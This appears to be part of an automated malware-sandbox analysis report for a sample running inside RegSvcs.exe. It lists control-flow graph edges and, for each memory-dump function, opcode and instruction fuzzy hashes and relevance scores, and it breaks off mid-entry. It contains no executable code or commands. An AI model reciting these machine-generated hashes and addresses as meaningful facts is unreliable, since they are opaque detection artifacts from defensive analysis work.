1051 56036d2-56036d8 1049->1051 1055 56038f5-56038fa 1050->1055 1056 5603938-560393b 1050->1056 1058 56036da-56036dc 1051->1058 1059 56036de-56036e0 1051->1059 1052->1018 1060 56038a5-56038b4 1052->1060 1053->1028 1063 56038c0-56038c6 1053->1063 1061 560367d-5603688 1054->1061 1062 560368e-56036b6 1054->1062 1055->1044 1057 56038fc 1055->1057 1056->1044 1064 560393d-5603942 1056->1064 1065 5603903-5603908 1057->1065 1066 56036ea-5603701 1058->1066 1059->1066 1060->1025 1060->1053 1061->1036 1061->1062 1084 56037aa-56037e0 1062->1084 1085 56036bc-56036c1 1062->1085 1063->1017 1063->1028 1064->1016 1064->1033 1067 560392a-560392c 1065->1067 1068 560390a-560390c 1065->1068 1077 5603703-560371c 1066->1077 1078 560372c-5603753 1066->1078 1067->1044 1075 560392e-5603931 1067->1075 1072 560391b-5603921 1068->1072 1073 560390e-5603913 1068->1073 1072->1018 1076 5603923-5603928 1072->1076 1073->1072 1075->1056 1076->1067 1080 56038fe-5603901 1076->1080 1077->1084 1090 5603722-5603727 1077->1090 1078->1044 1089 5603759-560375c 1078->1089 1080->1044 1080->1065 1091 56037e2-56037e6 1084->1091 1092 56037ed-56037f5 1084->1092 1085->1084 1089->1044 1093 5603762-560378b 1089->1093 1090->1084 1094 5603805-5603809 1091->1094 1095 56037e8-56037eb 1091->1095 1092->1044 1096 56037fb-5603800 1092->1096 1093->1084 1108 560378d-5603792 1093->1108 1097 5603828-560382c 1094->1097 1098 560380b-5603811 1094->1098 1095->1092 1095->1094 1096->1036 1101 5603836-5603852 1097->1101 1102 560382e-5603834 1097->1102 1098->1097 1100 5603813-560381b 1098->1100 1100->1044 1103 5603821-5603826 1100->1103 1105 560385b-560385f 1101->1105 1102->1101 1102->1105 1103->1036 1105->1036 1106 5603861-560387d 1105->1106 1106->1036 1108->1084 1109->986 1110->986
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2de23841496a8ae08ce23a12fdf9c5d54741430eb6ef1b0b72ee27bf909ebdd6
                                  • Instruction ID: c1444cbe826d3bd7df4669700ec2ac3c3d6c1c75105edaf2826554aa2032d36f
                                  • Opcode Fuzzy Hash: 2de23841496a8ae08ce23a12fdf9c5d54741430eb6ef1b0b72ee27bf909ebdd6
                                  • Instruction Fuzzy Hash: 1A025070B04109DFCB58CF69C984AAEBBB2FF88302F159969E815AB3A1D731DD41CB50
                                  Function 02BFF288 Relevance: .3, Instructions: 332COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9de59dc2fa3b2eb05eecf6ac0c07d7a2667daabb069cc1f96dab960fa1454b35
                                  • Instruction ID: 07b78dd5fde6b457be7ba0b8e1cc0de36edc19f40960a206a941887ed3068bf7
                                  • Opcode Fuzzy Hash: 9de59dc2fa3b2eb05eecf6ac0c07d7a2667daabb069cc1f96dab960fa1454b35
                                  • Instruction Fuzzy Hash: 47C1C930A00219DBDF6C4F7598142BDBAB2FFC8750F28C569D942B66D8CF348885EB65
                                  Function 02BFC7D8 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e539d93f98ba64e99bf7f7bdd3ba17b983344a9da5d44d4758d07f4fe70ad31b
                                  • Instruction ID: f13f7ea02b015e7084c6cb697ff7abf2b1bd08de85c2ae6d0ea1f555600f8b97
                                  • Opcode Fuzzy Hash: e539d93f98ba64e99bf7f7bdd3ba17b983344a9da5d44d4758d07f4fe70ad31b
                                  • Instruction Fuzzy Hash: 08B14C70E0020D8FDB54CFA9C8857ADBFF2EF88714F14856AD915E7294EB749889CB81
                                  Function 02BF1B88 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5133bb809b45675f3258da868b3318dcbb66dce7e4e7c815540c60be5ebd7cb2
                                  • Instruction ID: d1b59fb865bf6efa83023ecfe73a7095eec254746e027cdb2f805d775b8a7314
                                  • Opcode Fuzzy Hash: 5133bb809b45675f3258da868b3318dcbb66dce7e4e7c815540c60be5ebd7cb2
                                  • Instruction Fuzzy Hash: 81B167B2A14245CFC389CF28C0E0559BFB2FF9531076688E6CA469F291D734EC5ACB50
                                  Function 02BF22E8 Relevance: .3, Instructions: 263COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 07a1a7306ed3dd3c0b28cafe88596a0cac547ceb93739327c0f48ef1f9e625e8
                                  • Instruction ID: 259546fd8a6c8ff5a2d0833099cb176f975a48a4e07dc9c2694b12bf35635901
                                  • Opcode Fuzzy Hash: 07a1a7306ed3dd3c0b28cafe88596a0cac547ceb93739327c0f48ef1f9e625e8
                                  • Instruction Fuzzy Hash: 08A121B1A14301CFC388CF28C8E0919BBB5FB9130475684A6DE16DB2A1C334EC59CB91
                                  Function 02BF085F Relevance: .3, Instructions: 258COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad601ad5ebf4993cfe12050ffd21629eb3c2822da3f36e6963ad324a4cff037c
                                  • Instruction ID: 83988d95ee7fb9f74a1dfe16bc64315d7e1c8f79932a10b6c36041e5ac03c577
                                  • Opcode Fuzzy Hash: ad601ad5ebf4993cfe12050ffd21629eb3c2822da3f36e6963ad324a4cff037c
                                  • Instruction Fuzzy Hash: D2A13571A1424ACFC748DFA8C4906AEFBF2FF94300F1589AAD555AB396D7309C16CB81
                                  Function 02BF1B08 Relevance: .3, Instructions: 257COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6cdb55875a47c451b64dd3d92a6b7f85b02f7b0b0bb994d9396baa5ff94a6948
                                  • Instruction ID: e52edc283ae6c46801971c419ef5f0bef38311d0045679e8b897479c4cc1655e
                                  • Opcode Fuzzy Hash: 6cdb55875a47c451b64dd3d92a6b7f85b02f7b0b0bb994d9396baa5ff94a6948
                                  • Instruction Fuzzy Hash: D1A136B2A14245CFC389CF28C4E0959BFB2FF9531076A8496CA569F391D334ED5ACB50
                                  Function 02BF1EB6 Relevance: .2, Instructions: 250COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 35812f6e801d3166926d26c02fcc4e7efc7ed7268ac308fcf08bd6fb97197257
                                  • Instruction ID: efe709a2f0bd364bc3523a8627d835a75025c1d95c0f8399f477776459c4faa8
                                  • Opcode Fuzzy Hash: 35812f6e801d3166926d26c02fcc4e7efc7ed7268ac308fcf08bd6fb97197257
                                  • Instruction Fuzzy Hash: FBA146B6A04245CFC389CF28C0E0959BFB2FF953147668496CE569F691D334EC5ACB50
                                  Function 02BF1DA1 Relevance: .2, Instructions: 248COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4cc4748743d0423d3f3ad33c87575f617144b089f74aeb3f7ea7d558d0b11bfe
                                  • Instruction ID: b583f7ef1b56e96a1c89ff80fb42c36b6105b4c8412a4d4407fd1c2434c06e5e
                                  • Opcode Fuzzy Hash: 4cc4748743d0423d3f3ad33c87575f617144b089f74aeb3f7ea7d558d0b11bfe
                                  • Instruction Fuzzy Hash: 44A136B6A04245CFC389CF28C0E0959BFB2FF963107A68496CE569F291D334EC5ACB50
                                  Function 02BF204F Relevance: .2, Instructions: 246COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ae587241d792cc4cae497c3001f96524ad93b22650e5c702c58d3943a7a855d8
                                  • Instruction ID: 2a0e5aef5fee4683bb6d43937601dbf45b5c4d2ba0e59c3806e5929d365e6bcd
                                  • Opcode Fuzzy Hash: ae587241d792cc4cae497c3001f96524ad93b22650e5c702c58d3943a7a855d8
                                  • Instruction Fuzzy Hash: BFA135B6A042458FC389CF28C0E4959BFB1FF9631476685D6CE569F292C334E85ACB50
                                  Function 02BF218C Relevance: .2, Instructions: 244COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b1bba75218ebca22a925215b36d1c9a10b79c1eac6c0cfd257e4a1e9f2f91b76
                                  • Instruction ID: 151ecc418b61c7f26e88e9ec15bb443517a142f4a54d04107bdb6a84f6985fe0
                                  • Opcode Fuzzy Hash: b1bba75218ebca22a925215b36d1c9a10b79c1eac6c0cfd257e4a1e9f2f91b76
                                  • Instruction Fuzzy Hash: 73A145B6A04245CFC389CF28C0E4959BFB1FF953107A68496CE569F292C334EC9ACB50
                                  Function 02BF1F16 Relevance: .2, Instructions: 244COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 72ed5a77eacba2691b00069207fa64196b3e193f7952e9a33f2e46114d8e541d
                                  • Instruction ID: 05e28ed284e49da6207c83ef9bb13e00f07ecad8b789f14295bcfe2ef8f7d3ca
                                  • Opcode Fuzzy Hash: 72ed5a77eacba2691b00069207fa64196b3e193f7952e9a33f2e46114d8e541d
                                  • Instruction Fuzzy Hash: B7A134B6A04245CFC389CF28C0E4959BFB1FF953147A68496CE569F692C334EC9ACB50
                                  Function 02BF211A Relevance: .2, Instructions: 242COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 62cd81ea33465d9ef5d18fd12d566217c700e859d9083fe3c21250ac7f467eef
                                  • Instruction ID: fb2deefe5ee0c0faced80c164369cb563bd87957090cf298fbcc8cd5b10daa55
                                  • Opcode Fuzzy Hash: 62cd81ea33465d9ef5d18fd12d566217c700e859d9083fe3c21250ac7f467eef
                                  • Instruction Fuzzy Hash: 42A146B6A04245CFC389CF28C0E4959BFB2FF953147A68496CE569F692C334EC5ACB50
                                  Function 056028D8 Relevance: .2, Instructions: 225COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02e4eb31ecb916441776c1f204a3293164004d762022fa24ad1bccebd9c37db3
                                  • Instruction ID: 9da3928ec006da3f31067a7b96c5992645004929581ee74cdf933e645aa3da1c
                                  • Opcode Fuzzy Hash: 02e4eb31ecb916441776c1f204a3293164004d762022fa24ad1bccebd9c37db3
                                  • Instruction Fuzzy Hash: 00817D38B041158FDB1CDF69C8ACA6BB7B2FF88214B549169D806E77A4DB31E841CB90
                                  Function 02BFF741 Relevance: .2, Instructions: 222COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b0df3ab25346d74745b64bac3a4136cfc46ccd02cf5ac4eba4adb473bb177ec8
                                  • Instruction ID: 66ad871fc15b6c9b92d58e4622175c4afc7307838fd7472e54bfb03bc2dcae0f
                                  • Opcode Fuzzy Hash: b0df3ab25346d74745b64bac3a4136cfc46ccd02cf5ac4eba4adb473bb177ec8
                                  • Instruction Fuzzy Hash: 4C71D130B10205DBDB989B78945477E76B7EBC8344F2484AAE612EBB94DB70DC09CB91
                                  Function 02BFF750 Relevance: .2, Instructions: 219COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 19e0ad1b2996df14946994f96b312db53de0c75277e4ae648be630dea69a670e
                                  • Instruction ID: 9aadd9d0fec5f523f10d238d8004549c7efc086a4ee3656fc5f84d7acc620d67
                                  • Opcode Fuzzy Hash: 19e0ad1b2996df14946994f96b312db53de0c75277e4ae648be630dea69a670e
                                  • Instruction Fuzzy Hash: AA71E230B10205DBDB989B78945477E76B7EBC4344F2484AAEB02EB794DB70DC09CB91
                                  Function 02BFFB02 Relevance: .2, Instructions: 206COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4e18d68518349fc2f2ba8e2fdb1b394c2d68a1586193e2d25d206cf9bb1a6872
                                  • Instruction ID: ea30a84320acd060e6494e39fc90f14292cd3f3b590bde34ce8852e0bc49a2fe
                                  • Opcode Fuzzy Hash: 4e18d68518349fc2f2ba8e2fdb1b394c2d68a1586193e2d25d206cf9bb1a6872
                                  • Instruction Fuzzy Hash: 2E71F576B002049FD788CB79C854B6E7BF6AB88710F1485AAE606EB7D0DB70DC05CB80
                                  Function 02BF813B Relevance: .2, Instructions: 205COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45d3d0cdedfc009bd6ba88b2bdff1aa02c88327814246860d0121fd665ea215d
                                  • Instruction ID: 6b4071cdbbdfd244a7983f5ae0351af29ed7ed000ce66ed7b776f887578df8f4
                                  • Opcode Fuzzy Hash: 45d3d0cdedfc009bd6ba88b2bdff1aa02c88327814246860d0121fd665ea215d
                                  • Instruction Fuzzy Hash: A47102707103109FD749AB74E94876A7B66BBC8704F24896AD502EF394CF71DE498BC1
                                  Function 02BF8140 Relevance: .2, Instructions: 202COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d9f1fcbb4f6c374e992d40c4d107e7a574809e2004678bb75f8ffa4ee8c4cf8c
                                  • Instruction ID: 9e6daedce7d144b3585c2e9d904c7d8cb2de163f61b70b46784dfdedac298bea
                                  • Opcode Fuzzy Hash: d9f1fcbb4f6c374e992d40c4d107e7a574809e2004678bb75f8ffa4ee8c4cf8c
                                  • Instruction Fuzzy Hash: B67100707103109BD749AB74E94875A7B66BBC8704F24896AD902EF394CF72DE498BC1
                                  Function 05600EF8 Relevance: .2, Instructions: 201COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 786ef0e38cd7a015de073cc530f8ddcea293768a420bd9ecd5fe149c54a27303
                                  • Instruction ID: cf01838f190309aba7b8c2c100150800b13c2a3d1570f1288e81a57e119980e4
                                  • Opcode Fuzzy Hash: 786ef0e38cd7a015de073cc530f8ddcea293768a420bd9ecd5fe149c54a27303
                                  • Instruction Fuzzy Hash: 7A71FE357102008FC35DEB38D948B2B77A7BBC9314B61956AE805DB794DB31DD06CB92
                                  Function 02BFE8A8 Relevance: .2, Instructions: 194COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 432858c2181cefc806cb2ad4b8e8ce6bf4c076cf8d4113ae0457454873d8540f
                                  • Instruction ID: 3633c7538e79ae76e93cd5e1267826adf7d05e983440409a50bd5f7f4818ba82
                                  • Opcode Fuzzy Hash: 432858c2181cefc806cb2ad4b8e8ce6bf4c076cf8d4113ae0457454873d8540f
                                  • Instruction Fuzzy Hash: D261B231E00609CFCB94EBB9D54426DBBB2FF84200F1185AAD515AB364DB31ED2ACB81
                                  Function 05600FAE Relevance: .2, Instructions: 186COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3163684374.0000000005600000.00000040.00000800.00020000.00000000.sdmp, Offset: 05600000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_5600000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ad9c24fac67dd6ea57b5e5563d1a4ed12e19773ee91b46395d72afe00eb15124
                                  • Instruction ID: 220cf2780e9e1767b8ba994f711c684bfab49b3ff76bb91bbb6a471a8fe624b9
                                  • Opcode Fuzzy Hash: ad9c24fac67dd6ea57b5e5563d1a4ed12e19773ee91b46395d72afe00eb15124
                                  • Instruction Fuzzy Hash: 8361FD35710200CFC35DEB28DA48B2B77A7BBC9314B65959AE805DB794EB30DD06CB92
                                  Function 02BF4014 Relevance: .2, Instructions: 183COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 16631d869a712c465cca8c24f47c217d665d280868dfd0effff454852bafa2f0
                                  • Instruction ID: 9644e2bc9a7a170aa4f017d92eb973b0b307a3aa374ce2fe060500b4b1160230
                                  • Opcode Fuzzy Hash: 16631d869a712c465cca8c24f47c217d665d280868dfd0effff454852bafa2f0
                                  • Instruction Fuzzy Hash: D2616775B043818FD7898B7484647AFBFB3AFD5200B6984AAD682DB342DB30CC42C790
                                  Function 02BF6E20 Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6250ad7d73d534555110085c60a55a44bb39b58867a52c85ade1d4a02ea5b62d
                                  • Instruction ID: b87c90b96e099e37938cac4b526fb8810292e27d97c8921fc40978d6b846d8d6
                                  • Opcode Fuzzy Hash: 6250ad7d73d534555110085c60a55a44bb39b58867a52c85ade1d4a02ea5b62d
                                  • Instruction Fuzzy Hash: AB517B32B042958FC7898B74C5501AFBFBBBFCA200B5544AAD961EB391EB31CD05CB91
                                  Function 02BF6140 Relevance: .2, Instructions: 172COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 25a4010c9cc6766b5e7e860209280c0ea1448d119f02096f2d13102aafa31133
                                  • Instruction ID: 00b91f3087ca4d7b2cf72c56c93be61f241f1a0af042d25897b7cf3c2497ae1b
                                  • Opcode Fuzzy Hash: 25a4010c9cc6766b5e7e860209280c0ea1448d119f02096f2d13102aafa31133
                                  • Instruction Fuzzy Hash: 256144757003418FD758BF78E85C26ABBB6FBC8200745896AD926DB388DF309D49CB81
                                  Function 02BF7A18 Relevance: .2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 28ded0d5cb4d9c9c0bb82befea06566ede7a207e0f74bef0b21f1f007e82364f
                                  • Instruction ID: 2d486d6d40c9f9391859069ad1646a98867e187908ce0ec28c2883f47ba17093
                                  • Opcode Fuzzy Hash: 28ded0d5cb4d9c9c0bb82befea06566ede7a207e0f74bef0b21f1f007e82364f
                                  • Instruction Fuzzy Hash: 1751FF34B041058FD7949B68D49875AF7B2EB88310F1489EAD606EB385DF71CC95CB80
                                  Function 02BF0F00 Relevance: .2, Instructions: 169COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 76986b56173e616dd198cb23f7f0726bee58614e8e22de217abe1d3a5aaa2969
                                  • Instruction ID: accfe045e57b89cbdd363eb63586d375288bd44be6f5b9f34fea9fcc7b39acf8
                                  • Opcode Fuzzy Hash: 76986b56173e616dd198cb23f7f0726bee58614e8e22de217abe1d3a5aaa2969
                                  • Instruction Fuzzy Hash: 5D513471B1024A8FCB489BB8C4546AEFBF2FF99300F1544AAD555AB3A6D7308D06CB91
                                  Function 02BF6133 Relevance: .2, Instructions: 158COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b9bf3b761da8bf14c8ae8d4d5413167d57e32f88efee569b6d0828c59ecbf90e
                                  • Instruction ID: c5ffa4026af5b7a61a8fa0dac99219aad73a135b2479009ea8c12f29c4d43433
                                  • Opcode Fuzzy Hash: b9bf3b761da8bf14c8ae8d4d5413167d57e32f88efee569b6d0828c59ecbf90e
                                  • Instruction Fuzzy Hash: 1051F5746002448FD758BB74E85C26E7BB6FBC8201741897AD526DB398DB309D49CB91
                                  Function 02BFE0A0 Relevance: .2, Instructions: 157COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b76f6a3d2332bab42873746e19ff1d58437b93939cc373108d99c8c8dd1bdc3a
                                  • Instruction ID: f9fba1afccbe1cedf9958e76311db569dc36831cb522bca6dcd370f6f75d3cf8
                                  • Opcode Fuzzy Hash: b76f6a3d2332bab42873746e19ff1d58437b93939cc373108d99c8c8dd1bdc3a
                                  • Instruction Fuzzy Hash: 73512831B002148BDBD8AA78991537E76A79BC9251B1488B7D702EB764EF30CD19CB92
                                  Function 02BFE091 Relevance: .2, Instructions: 157COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9d166518a62527fba3ba09f9bade80d871970b646ad862aeb69c42466038974c
                                  • Instruction ID: ab30ac4344e56c64f326131377e0df0ce3cf1fabbd84c65fecbf15e7715d259b
                                  • Opcode Fuzzy Hash: 9d166518a62527fba3ba09f9bade80d871970b646ad862aeb69c42466038974c
                                  • Instruction Fuzzy Hash: 0B514B31B041148BDBD85A78991537E76A3DBC9250F1488A7D702EB364EF30CD19CB92
                                  Function 02BF6E10 Relevance: .1, Instructions: 143COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3155921895.0000000002BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_2bf0000_RegSvcs.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6c4ab8330112a4efb33e4b25a482379a06368f34931989372d8a8f08f22ff298
                                  • Instruction ID: 594952859eab98b2a0f134861af91cff192932f76ab8089db8da6a10349156c9
